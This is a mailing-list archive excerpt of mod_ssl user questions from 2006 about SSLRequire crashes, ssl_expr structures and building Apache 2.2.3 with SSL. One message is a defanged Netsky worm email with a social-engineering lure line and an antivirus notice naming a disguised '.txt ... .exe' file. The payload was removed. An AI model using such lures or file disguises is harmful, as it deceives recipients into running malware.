        b=dN3bHWwKqDUQ3X2S/tkzcSocZy6zNBL+gZdfGw2JcqdxWcokAfnXvGW5cVGkvzIixs4JcOt99EnlRcvwHZWhQnmLayUkmoq+f1PppS10gWwoit5CYrMy82M1AWIZMvHxeVlwaOROaMh4UfCwsGgOiGujzdEl+rysP0Zjco3snb8=
Received: by 10.82.164.9 with SMTP id m9mr1497347bue.1162902941128;
        Tue, 07 Nov 2006 04:35:41 -0800 (PST)
Received: by 10.82.116.14 with HTTP; Tue, 7 Nov 2006 04:35:40 -0800 (PST)
Message-ID: 
Date: Tue, 7 Nov 2006 12:35:41 +0000
From: "Christiaan Lamprecht" 
To: modssl-users@modssl.org
Subject: Forgotten mod_ssl pool?
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Christiaan Lamprecht" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apache 2 SSL question which is probably related to mod_ssl:

The Apache 2.2.3 SSL implementation has a pool in the ssl_expr_node
struct (in ssl_expr.h) whereas the latest mod_ssl implementation does
not. I know mod_ssl is only for Apache 3.1.* but the pool in Apache
2.2.3 doesn't seem to be used anyway!

Is this just a forgotten pool from older versions of mod_ssl or does
it have a purpose?

An extra pointer in the struct is not really a problem as such but I
want to make copy (in my own allocated memory, which is not tied to an
apache pool) and then execute it later using ssl_expr_exec(....) If a
copy of the contents of the pool is also necessary, well then it could
be a problem.


Many thanks to anyone who knows
Christiaan


Some more details below:

-------------------------------------------------------
ssl_expr.h:

typedef struct {
   ssl_expr_node_op node_op;
   void *node_arg1;
   void *node_arg2;
   apr_pool_t *p;
} ssl_expr_node;

typedef ssl_expr_node ssl_expr;
-------------------------------------------------------
The pool in ssl_expr_node doesn't seem to be used? Either when the
struct is created(ssl_expr.c):
ssl_expr *ssl_expr_comp(apr_pool_t *p, char *expr)

or when it is evaluated:
int ssl_expr_exec(request_rec *r, ssl_expr *expr)


Many thanks in advance
Christiaan Lamprecht
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  7 16:35:39 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 08F7214D887; Tue,  7 Nov 2006 16:35:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sam.dfn-cert.de (sam.dfn-cert.de [193.174.13.196])
	by master.modssl.org (Postfix) with ESMTP id 1FED514D873
	for ; Tue,  7 Nov 2006 16:35:38 +0100 (CET)
Received: from localhost (unknown [127.0.0.1])
	by sam.dfn-cert.de (Postfix) with ESMTP id B3F82744833
	for ; Tue,  7 Nov 2006 15:35:20 +0000 (UTC)
Message-ID: <4550A7B6.70503@dfn-cert.de>
Date: Tue, 07 Nov 2006 16:35:18 +0100
From: Jan Klever 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060411
X-Accept-Language: de-de, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSLRequire: core dump with long strings, sometimes unreliable expressions
X-Enigmail-Version: 0.92.1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan Klever 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

im trying to protect URLs with SSLRequire and i am running into trouble
with Apache segmentation faults und expressions that work sometimes, but
not always.

Setup ist Apache 1.3.37 on a Linux box with ModSSL built into Apache,
not as external .so. No RPMs, everything built from source.

I want to protect two URLS: /foo and /cgi-bin/foo. /foo redirects per
'http-equiv="refresh" content="0' to /cgi-bin/foo. /cgi-bin/foo displays
a frameset of two frames, which are generated by perl-scripts.

So, i am using two  blocks, one for /foo and one for
/cgi-bin/foo, each containing the same SSLRequire expression. The blocks
are contained in a external file, that ist included to Apache
configuration with "Include". Everything is fine, when i am using
expressions like:

  SSLRequire ( %{SSL_CLIENT_I_DN_CN} eq "Foo CA" \
    and %{SSL_CLIENT_S_DN_CN} in {"Bar", "Baz"} )

Works great, but for some reason i want to check against the whole
certificate. This is where the trouble starts.

I tried:
  SSLRequire (%{SSL_CLIENT_CERT} == file ("/path/to/bar.pem") \
    or %{SSL_CLIENT_CERT} == file ("/path/to/baz.pem")) \
    and %{SSL_CLIENT_CERT_CHAIN_0} == file ("/path/to/foo-ca.pem")

Browsing to /foo and being redirect to /cgi-bin/foo i sometimes get:
- One frame with content, the other with 403 forbidden.
- Both frames with 403 forbidden.
- Both frames with content
- One Page (no frames) with 403 forbidden

In case of 403 the error log states:  Failed expression.

Then i tried to in include the PEM encoded cert into SSLRequire:

SSLRequire (%{SSL_CLIENT_CERT} eq "-----BEGIN
CERTIFICATE-----\nImage_completet_PEM_in_here\n-----END CERTIFICATE-----\n

Which results in segmentation faults when trying to start Apache! The
parser of ModSSL seems to be limited to a number of characters in
this place. Shorter expressions are ok, complete PEM certificate and my
Apache won't start, instead he throws a segmentation fault.

Finally i came up with matching against the last 128 or 256 bytes of the
certificate where the signature is located. I match with m## so slashes
inside PEM don't matter, '+' are quoted, \n is replace by .?:

  SSLRequire %{SSL_CLIENT_CERT} =~
m#ZlL5lB6BhQqB9Cwa3OCetBxuqT5Rx6eQB0UJQQF\+v5
R80H6XPjeURnbD8UvNflZG.?2noIZ4UxkVoKxFAlTeept5EylxVclQ4NTsLyrsQnxjrrAUUy3eP3I\+C
kreLRuv0F.?f08ISFtKaHttoQ==.?-----END CERTIFICATE-----# \
    and %{SSL_CLIENT_CERT_CHAIN_0} =~
m#w3qcUn85WX5Vmi/QI\+UCG6kuNtKk\+CAWYkN\+n
t4vwa11SzCQLCYYccMrr\+5CMCpG.?PeXsmiMCpYUitWk9AryzyMPiDBc9acZebdY44EbQHE4DaNNrrW
N1rcdagQ\+RMWZt.?8cv\+nUG4NUQCPeUffrKVLHw56jvWsR6GJaode2GDh79yRKdj5w==.?-----END
 CERTIFICATE-----#

And what do i get? Same result as with file():

Browsing to /foo and being redirect to /cgi-bin/foo i sometimes get:
- One frame with content, the other with 403 forbidden.
- Both frames with 403 forbidden.
- Both frames with content
- One Page (no frames) with 403 forbidden

Is this behaviour known? Any Solution?

Cheers
Jan
-- 
Jan Klever (PKI Team), DFN-CERT Services GmbH
https://www.dfn-cert.de, +49 40 808077-619 / +49 40 808077-555 (Hotline)
PGP RSA/2048, 501B8FB1, 37 DD 41 9A E9 3B CB 2B 94 E5 F8 6A 76 CA 16 C1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  7 17:22:54 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B2D4A14D97B; Tue,  7 Nov 2006 17:22:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns1.tibonline.net (mail.tibonline.net [12.21.237.6])
	by master.modssl.org (Postfix) with SMTP id 264F314D851
	for ; Tue,  7 Nov 2006 17:22:53 +0100 (CET)
Received: (qmail 19176 invoked from network); 7 Nov 2006 16:22:27 -0000
Received: from unknown (HELO Sunshine) (12.21.237.32)
  by 0 with SMTP; 7 Nov 2006 16:22:27 -0000
From: "kbajwa" 
To: 
Subject: Mod_SSL
Date: Tue, 7 Nov 2006 11:22:19 -0500
Message-ID: <031301c70288$e7d39740$20ed150c@Sunshine>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0314_01C7025E.FEFD8F40"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.2757
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "kbajwa" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0314_01C7025E.FEFD8F40
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hello List:

=20

My first posting!  I am installing Apache-2.2.3 and would like to =
install
mod_ssl. I notice that current/latest version of mos_ssl is for =
Apache-1.x.x
version. Is there any way (with a patch) to install the latest version =
of
mod_ssl on Apache-2.x.x?

Thanks.

=20

Kirt

=20

=20


------=_NextPart_000_0314_01C7025E.FEFD8F40
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable



















Hello List:



 



My first posting!  I am installing Apache-2.2.3 =
and would like
to install mod_ssl. I notice that current/latest version of mos_ssl is =
for
Apache-1.x.x version. Is there any way (with a patch) to install the =
latest
version of mod_ssl on Apache-2.x.x?



Thanks.



 



Kirt



 



 









------=_NextPart_000_0314_01C7025E.FEFD8F40--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  7 18:09:05 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D6D7114D87D; Tue,  7 Nov 2006 18:09:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 611weximc01.cityofhouston.net (611wexicm01.cityofhouston.net [204.235.237.120])
	by master.modssl.org (Postfix) with ESMTP id 5177614D851
	for ; Tue,  7 Nov 2006 18:09:04 +0100 (CET)
Received: by 611weximc01.cityofhouston.net with Internet Mail Service (5.5.2653.19)
	id ; Tue, 7 Nov 2006 11:09:08 -0600
Message-ID: <0BD1505F7EB5114B9956F32D699303C9160BC9B7@611wex03.cityofhouston.net>
From: "Kong, Yi - HPL" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Mod_SSL
Date: Tue, 7 Nov 2006 11:08:32 -0600 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7028F.5A8A7230"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kong, Yi - HPL" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C7028F.5A8A7230
Content-Type: text/plain

You add ssl arguement when you configure the apache

  _____  

From: kbajwa [mailto:kbajwa@tibonline.net] 
Sent: Tuesday, November 07, 2006 10:22 AM
To: modssl-users@modssl.org
Subject: Mod_SSL



Hello List:

 

My first posting!  I am installing Apache-2.2.3 and would like to install
mod_ssl. I notice that current/latest version of mos_ssl is for Apache-1.x.x
version. Is there any way (with a patch) to install the latest version of
mod_ssl on Apache-2.x.x?

Thanks.

 

Kirt

 

 


  _____  

<< ella for Spam Control >> has removed 4905 Spam messages and set aside
10689 Newsletters for me
You can use it too - and it's FREE!  www.ellaforspam.com
 	

------_=_NextPart_001_01C7028F.5A8A7230
Content-Type: text/html











You add ssl arguement when you configure the 
apache






From: kbajwa [mailto:kbajwa@tibonline.net] 

Sent: Tuesday, November 07, 2006 10:22 AM
To: 
modssl-users@modssl.org
Subject: Mod_SSL







Hello List:


 


My first posting!  I am 
installing Apache-2.2.3 and would like to install mod_ssl. I notice that 
current/latest version of mos_ssl is for Apache-1.x.x version. Is there any way 
(with a patch) to install the latest version of mod_ssl on 
Apache-2.x.x?


Thanks.


 


Kirt


 


 







  

    << ella for Spam Control >> has removed 
      4905 Spam messages and set aside 10689 Newsletters for 
      me
You can use it too - and it's FREE!  www.ellaforspam.com


------_=_NextPart_001_01C7028F.5A8A7230--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov  7 23:05:46 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6C9F114D893; Tue,  7 Nov 2006 23:05:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.173])
	by master.modssl.org (Postfix) with ESMTP id 322A614D851
	for ; Tue,  7 Nov 2006 23:05:45 +0100 (CET)
Received: by ug-out-1314.google.com with SMTP id z35so1591597ugc
        for ; Tue, 07 Nov 2006 14:05:27 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth;
        b=DzklS89KaEjsBL5NewvZ0Pk4oB1Pr5ArZ8x+BbnmZEhQPC5jBtuloKokqij5vcazYMRdO/DKQktNdpbD1YXrCmoWJ9c3XAVsKwEZ4EYj7qPINYzcSv1QG1iUTTMNwkckYv/C721mMvfE8dCwQJKV2Jth9tpsNvIKJZ9pmswXn6A=
Received: by 10.78.58.11 with SMTP id g11mr5536959hua.1162937126902;
        Tue, 07 Nov 2006 14:05:26 -0800 (PST)
Received: by 10.78.90.19 with HTTP; Tue, 7 Nov 2006 14:05:26 -0800 (PST)
Message-ID: 
Date: Tue, 7 Nov 2006 17:05:26 -0500
From: "Cliff Woolley" 
To: modssl-users@modssl.org
Subject: Re: Mod_SSL
In-Reply-To: <0BD1505F7EB5114B9956F32D699303C9160BC9B7@611wex03.cityofhouston.net>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_12526_31950131.1162937126766"
References: <0BD1505F7EB5114B9956F32D699303C9160BC9B7@611wex03.cityofhouston.net>
X-Google-Sender-Auth: 66388e8f6e1537b7
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Cliff Woolley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_12526_31950131.1162937126766
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

What this person is getting at is that the reason you can't find a mod_ssl
patch for Apache 2.x is that mod_ssl comes pre-bundled with Apache 2.x.
Just enable it when you run configure on the apache build.

--Cliff


On 11/7/06, Kong, Yi - HPL  wrote:
>
>  You add ssl arguement when you configure the apache
>
>  ------------------------------
> *From:* kbajwa [mailto:kbajwa@tibonline.net]
> *Sent:* Tuesday, November 07, 2006 10:22 AM
> *To:* modssl-users@modssl.org
> *Subject:* Mod_SSL
>
> My first posting!  I am installing Apache-2.2.3 and would like to install
> mod_ssl. I notice that current/latest version of mos_ssl is for
> Apache-1.x.x version. Is there any way (with a patch) to install the
> latest version of mod_ssl on Apache-2.x.x?
>

------=_Part_12526_31950131.1162937126766
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


What this person is getting at is that the reason you can't find a mod_ssl patch for Apache 2.x is that mod_ssl comes pre-bundled with Apache 2.x.  Just enable it when you run configure on the apache build.

--Cliff



On 11/7/06, Kong, Yi - HPL <Yi.Kong@cityofhouston.net> wrote:












You add ssl arguement when you configure the 
apache






From: kbajwa [mailto:kbajwa@tibonline.net] 

Sent: Tuesday, November 07, 2006 10:22 AM
To: 
modssl-users@modssl.org
Subject: Mod_SSL


My first posting!  I am 
installing Apache-2.2.3 and would like to install mod_ssl. I notice that 
current/latest version of mos_ssl is for Apache-1.x.x version. Is there any way 
(with a patch) to install the latest version of mod_ssl on 
Apache-2.x.x?



------=_Part_12526_31950131.1162937126766--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov  8 08:05:33 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 71F2E14D8AB; Wed,  8 Nov 2006 08:05:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.238])
	by master.modssl.org (Postfix) with ESMTP id E436A14D88B
	for ; Wed,  8 Nov 2006 08:05:32 +0100 (CET)
Received: by wx-out-0506.google.com with SMTP id h27so1548639wxd
        for ; Tue, 07 Nov 2006 23:05:15 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=IheR7P+UmgtRZ5Hdsd3Gfx5coKxCBaLKVMNahm5e5ZnHzwGG2UYwjdW23j4FDtcD8QxkbNHmjCEMzkvthk0tFwcp5GRB84LoaTv+0YHz50UUNJNzEInDLd9oJhNTvs83wt4hQBZnD7f/DcN38RSjJ5dGAlahkleQI9NRtoSoI/g=
Received: by 10.90.88.13 with SMTP id l13mr2789205agb.1162969515776;
        Tue, 07 Nov 2006 23:05:15 -0800 (PST)
Received: by 10.90.102.9 with HTTP; Tue, 7 Nov 2006 23:05:15 -0800 (PST)
Message-ID: <30c82f5f0611072305x316f4b6fn85ca9e89effa4473@mail.gmail.com>
Date: Wed, 8 Nov 2006 08:05:15 +0100
From: "Louise Hoffman" 
To: modssl-users@modssl.org
Subject: Re: Howto "unload" the mod_ssl from memory?
In-Reply-To: <454E8D92.1080302@gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <30c82f5f0611041010j544f7461y1f5d2efc8b6beed@mail.gmail.com>
	 <30c82f5f0611041021l565f9829ie72ad8b7e32219c7@mail.gmail.com>
	 <30c82f5f0611041055h62b9cabdw78088977dca461db@mail.gmail.com>
	 <454E8D92.1080302@gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Louise Hoffman" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Hi Louise,

Hi Patrick =)

> Include conf.d/*.conf

>    So this includes *.conf files listed in the conf.d directory (in
> mine, this is on the same directory level as the "conf" directory
> below /etc/httpd). My ssl.conf file is in this second directory and
> has as one of its commands:

This was just it =)

I backed up the original and called it _ssl.conf

>From now on will I learn learn how to use SVN, and check /etc in as
the first thing, so I don't try something similar another time =)

>    I do not know if this will apply to your situation but it sounds like
> it might be something to check. It took me a couple of hours of digging
> around in the filesystem to find that one. I'm a noobie or I guess I
> would have found it quicker.  :-)

I think I spend about 4-5 hours on the debugging and tracing without
solving this problem, so I am very glad for Michael's and yours reply
=) I would very have solved it without.

With love,
Louise
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 10 14:03:47 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C487B14D8AF; Fri, 10 Nov 2006 14:03:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from modssl.org (wcoe-98.r-195-35-225.essentkabel.com [195.35.225.98])
	by master.modssl.org (Postfix) with ESMTP id EBCB614D89F
	for ; Fri, 10 Nov 2006 14:03:46 +0100 (CET)
From: rse@engelschall.com
To: modssl-users@modssl.org
Subject: Spamed?
Date: Fri, 10 Nov 2006 14:16:54 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0016----=_NextPart_000_0016"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20061110130346.EBCB614D89F@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: multipart/alternative; boundary=GDalert_boundary_730732

--GDalert_boundary_730732
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit

+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (FakefromWorm) in the following file: [list_ed.zip][document.txt                                                                   .exe]
W32/Netsky.P.worm

The file has been deleted to protect the network.
10/11/2006 14:01:00 [GMT+0100]

www.pandasoftware.com

+----------------------------------------------------+

--GDalert_boundary_730732
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable





+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (FakefromWorm) in the following file: [list_ed.zip][document.txt                                                                   .exe]
W32/Netsky.P.worm

The file has been deleted to protect the network.
10/11/2006 14:01:00 [GMT+0100]

www.pandasoftware.com

+----------------------------------------------------+





--GDalert_boundary_730732--

------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

I have visited this website and I found you in the spammer list. Is that true?


------=_NextPart_000_0016----=_NextPart_000_0016
Content-Type: application/octet-stream;
	name="list_ed.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="list_ed.zip"

UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA==

------=_NextPart_000_0016----=_NextPart_000_0016--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 10 14:52:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 58C2514D8AB; Fri, 10 Nov 2006 14:52:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from telkomsa.net (portia.telkomsa.net [196.25.211.4])
	by master.modssl.org (Postfix) with ESMTP id 4B50714D853
	for ; Fri, 10 Nov 2006 14:52:01 +0100 (CET)
Received: (qmail 8915 invoked from network); 10 Nov 2006 13:51:42 -0000
Received: from unknown (HELO monster) ([155.239.110.43])
          (envelope-sender )
          by O (qmail-ldap-1.03) with SMTP
          for ; 10 Nov 2006 13:51:41 -0000
Message-ID: <002e01c704cf$5e7473e0$2b6eef9b@monster>
From: "J.D. Whale" 
To: 
References: <20061110130346.EBCB614D89F@master.modssl.org>
Subject: Re: Spamed?
Date: Fri, 10 Nov 2006 15:51:10 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0020_01C704E0.0AE84C90"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2869
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2962
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "J.D. Whale" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0020_01C704E0.0AE84C90
Content-Type: text/plain;
	charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

Hi,

If I'm listed as a spammer I can't imagine why.  I never spam, and use =
BitDefender to avoid viruses, spam, etc.

Regards,
John
  ----- Original Message -----=20
  From: rse@engelschall.com=20
  To: modssl-users@modssl.org=20
  Sent: Friday, November 10, 2006 3:16 PM
  Subject: Spamed?


+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content =
(FakefromWorm) in the following file: [list_ed.zip][document.txt         =
                                                          .exe]
W32/Netsky.P.worm

The file has been deleted to protect the network.
10/11/2006 14:01:00 [GMT+0100]

www.pandasoftware.com

+----------------------------------------------------+


-------------------------------------------------------------------------=
-----


  I have visited this website and I found you in the spammer list. Is =
that true?


------=_NextPart_000_0020_01C704E0.0AE84C90
Content-Type: text/html;
	charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

=EF=BB=BF







Hi,


 


If I'm listed as a spammer I can't =
imagine=20
why.  I never spam, and use BitDefender to avoid viruses, spam,=20
etc.


 


Regards,


John


  
----- Original Message ----- 

  From:=20
  rse@engelschall.com 
  
  
Sent: Friday, November 10, 2006 =
3:16=20
  PM

  
Subject: Spamed?

  =


+----------------------------------------------------=
+

Panda GateDefender Performa has detected malicious content =
(FakefromWorm) in the following file: [list_ed.zip][document.txt         =
                                                          .exe]
W32/Netsky.P.worm

The file has been deleted to protect the network.
10/11/2006 14:01:00 [GMT+0100]

www.pandasoftware.com

+----------------------------------------------------+


  

  


  
I have visited this website and I found you in the spammer =
list. Is=20
  that true?



------=_NextPart_000_0020_01C704E0.0AE84C90--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 10 17:01:10 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 35CA514D8AB; Fri, 10 Nov 2006 17:01:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns1.tibonline.net (mail.tibonline.net [12.21.237.6])
	by master.modssl.org (Postfix) with SMTP id EBD8114D853
	for ; Fri, 10 Nov 2006 17:01:08 +0100 (CET)
Received: (qmail 992 invoked from network); 10 Nov 2006 16:00:38 -0000
Received: from unknown (HELO Sunshine) (12.21.237.32)
  by 0 with SMTP; 10 Nov 2006 16:00:38 -0000
From: "kbajwa" 
To: 
Subject: RE: Mod_SSL
Date: Fri, 10 Nov 2006 11:00:33 -0500
Message-ID: <001701c704e1$5d052740$20ed150c@Sunshine>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0018_01C704B7.742F1F40"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.2757
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "kbajwa" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0018_01C704B7.742F1F40
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

Cliff:

=20

You are all right. This is my first try to build a server, so I need =
further
help.

=20

I have downloaded the latest Apache version 'httpd-2.2.3'. I am at the =
point
where I need to patch it with 'mod_ssl" module. Can you guide me how to
patch 'httpd-2.2.3' with the latest version of 'mod_ssl-2.2.828-1.3.37'?

=20

Thanks in advance.

=20

Kirt

=20

-----Original Message-----
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]
On Behalf Of Cliff Woolley
Sent: Tuesday, November 07, 2006 5:05 PM
To: modssl-users@modssl.org
Subject: Re: Mod_SSL

=20


What this person is getting at is that the reason you can't find a =
mod_ssl
patch for Apache 2.x is that mod_ssl comes pre-bundled with Apache 2.x.
Just enable it when you run configure on the apache build.

--Cliff=20



On 11/7/06, Kong, Yi - HPL  wrote:

You add ssl arguement when you configure the apache

=20

  _____ =20

From: kbajwa [mailto:kbajwa@tibonline.net]=20
Sent: Tuesday, November 07, 2006 10:22 AM
To: modssl-users@modssl.org
Subject: Mod_SSL

My first posting!  I am installing Apache-2.2.3 and would like to =
install
mod_ssl. I notice that current/latest version of mos_ssl is for =
Apache-1.x.x
version. Is there any way (with a patch) to install the latest version =
of
mod_ssl on Apache-2.x.x?

=20


------=_NextPart_000_0018_01C704B7.742F1F40
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable



















Cliff:



 



You are all right. This is my first =
try to
build a server, so I need further help.



 



I have downloaded the latest Apache
version ’httpd-2.2.3’. I am at the point where I need to =
patch it
with ‘mod_ssl” module. Can you guide me how to patch =
‘httpd-2.2.3’
with the latest version of =
‘mod_ssl-2.2.828-1.3.37’?



 



Thanks in =
advance.



 



Kirt



 



-----Original =
Message-----

From:
owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of Cliff Woolley

Sent: Tuesday, November =
07, 2006
5:05 PM

To: =
modssl-users@modssl.org

Subject: Re: =
Mod_SSL



 





What this person is getting at is that the reason you can't find a =
mod_ssl
patch for Apache 2.x is that mod_ssl comes pre-bundled with Apache =
2.x. 
Just enable it when you run configure on the apache build.



--Cliff 










On =
11/7/06, Kong, Yi - HPL <Yi.Kong@cityofhouston.net&g=
t;
wrote:






You add ssl =
arguement
when you configure the apache



 












From: kbajwa
[mailto:kbajwa@tibonline.net]


Sent: Tuesday, November =
07, 2006
10:22 AM

To: modssl-users@modssl.org

Subject: =
Mod_SSL









My first posting!  I am installing =
Apache-2.2.3
